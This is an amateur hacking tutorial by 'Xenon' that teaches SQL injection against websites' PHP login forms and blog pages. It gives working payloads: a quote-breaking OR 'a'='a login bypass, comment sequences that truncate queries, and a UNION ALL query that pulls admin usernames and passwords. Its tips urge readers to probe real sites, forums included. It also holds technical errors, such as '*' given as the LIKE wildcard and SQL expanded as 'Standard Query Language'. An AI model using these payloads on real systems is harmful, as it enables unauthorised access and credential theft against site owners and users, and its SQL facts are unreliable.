Complete SQL H4xxing guide

***************
SQL Hacking
***************

The step-by-step article for learning how to SQL inject
Written by: Xenon

***************

Q. What is SQL?

A. I believe strongly in knowing what your doing is, rather than knowing everything about it. SQL is an abbreviation for the Standard Query Language.

As we look at the history of the internet, we see insecure HTTP ports, open to legal intrusion, then the secured ones, the sites with logins, and social sites that store information.
Where does all the information we fill in forms get stored? In a .txt file? I don't think so. All one would need to do is open it to retrieve all info. Besides, how could one extract particular data, and not the whole database?


Welcome to Databasing. A few common DB softwares are MySQL, MSSQL (Microsoft SQL - MS ACCESS), PostgreSQL, Oracle.
These softwares are manipulated and read by PHP coding. The PHP code sends a syntax to the DB to work on. The syntax remains more or less Standard, for all these softares, hence called SQL.

See this:



$info=mysql_result("SELECT * FROM information WHERE username='Alex' ");

It is highly recommended that one knows basic SQL before one hacks, so I have decided to include a few common queries in the article.

The SELECT query:

Like the one above, the SELECT retrieves data.

A table contains rows and columns.
Each column has a type of data, and each row different entries. Like so:

TABLE "INFORMATION"

username | password
admin root
alex user


So with the unless we give a parameter, the SELECT would retrieve the entire table.
Hence, the parameter.

WHERE:
WHERE username='Alex"
would extract:
username=Alex , password=user.

One or more parameters can be given like:
WHERE some1=this OR some2=this2

or

WHERE some1-this AND some2=this2

The OR checks for just one TRUE condition,
the AND for two TRUE conditions

LIKE: Seen in search engines.

SELECT * FROM information WHERE username LIKE 'al*'
* is the SQL Wildcard. This would extract the same row as above. (admin starts with 'ad', not 'al')



The UNION ALL:
Union the result of two queries, i.e. combine the result of two SELECT statements into one.
Note, that combining with UNION has a condition, both the SELECT statements should have the same number of columns, even if some columns are 'null'

SELECT * FROM information WHERE username='admin' UNION ALL SELECT * FROM information WHERE username='alex'

In case you wonder what * is, its our wildcard, to extract all columns. Since both the selects are from the same table in this case, * would mean the same number of columns in both the cases, hence allowing the UNION ALL..


This query would give both the rows as the result.


The AS:
AS allows you to define another name, like an "A.K.A", or an alias, for a particular column, table, or even the entire query.
See this:

SELECT username AS user, password AS pass FROM information WHERE username='alex' AS result_final

The comma enables you to select more than one column from our DB.
So now,
user=username
pass=password

and the whole data returned = result_final

Now, if the PHP refers to user, it will show the value of the original username.


NOTE:While SQL hacking, when a variable is given an alias, the programmer probably used that alias later, so your UNION ALL should use the same aliases to not give an error and show the data.


SQL Hacking:
Well the basic fundamental is to not hack our DB software, but the programmers vulnerable PHP that uses the DB.

All login forms add variables to the query so that the particular user is checked up.
This is done by GET or POST methods.

See this:

SELECT * FROM users WHERE username='".$username."'

Now we hack the SQL like this:

Put the value of $username in the form, as:
user' OR 'a'='a

So the query will now be processed like:

SELECT * FROM users WHERE username='user' OR 'a'='a'

For the password, do the same.

This will return all the usernames and password for character 'a' is always equal to itself.
We used 'a'='a to dodge the open/close inverted commas.

Sometimes, one could comment out the rest of the statement that PHP adds, by using SQL comments like:
/*
/**
//
--

Get to know your SQL Software, and google for its syntax.

Another SQL Hack would be:
Found in blogs.

See this:

SELECT topic AS content FROM info WHERE topic_number=1

Obviously, as the users click different topics, the value of topic_number changes. So topic_number is injectable. (Not always the case, SQL Hacks can be protected against by cautious programmers)

The obvious injection would be:

SELECT topic AS content, postedby AS poster, email FROM info WHERE topic_number=0 UNION ALL SELECT user AS content, password AS poster, null FROM users WHERE id=1

EXPLAINATION:

We keep same aliases for the columns, so the queries merge good.
Notice the null.

Its to keep the number of columns the same so that the union is successful. At the same time, email is unioned with null or nothing.

WHERE id=1 works on the presumption that the first user registered is always the admin, and his user id number is in the column named 'id'.



***************
TIPS
***************

1. Hunt down error messages that give you table names, column names, the aliases used, etc. THIS IS A NECESSITY!

2. Check out the target's site for PHP forms and variables that you give values to. Look at the URLs as you navigate.

3. Learning SQL helps!

4. You need practise and be familiar with the site. This is why the easiest sites to hack need a week at least, to be familiar with all the variables and column and table names.

5. Try personal sites, before attempting to hack IP.Boards and vBulletins.

6. For common scripts, download the script, hunt the vulnerabilities down by looking at the source,

7. Be patient. It takes time to hack databases, even for the simplest sites.

8. Don't get frustrated with large errors. Copy into a text editor, make font enjoyable, and read through the errors.

9. Never target one page on the site. See all scripts. Different errors give different table names.

10. Google for vulnerabilities in common software, syntax for a DB software, articles, study the site pattern, and be bold enough to guess column names, like 'id'.






---

Remember. 11% websites on the net are vulnerable to SQL injections.

11% is a huge figure, considering the number of websites out there.

---
source from 1,2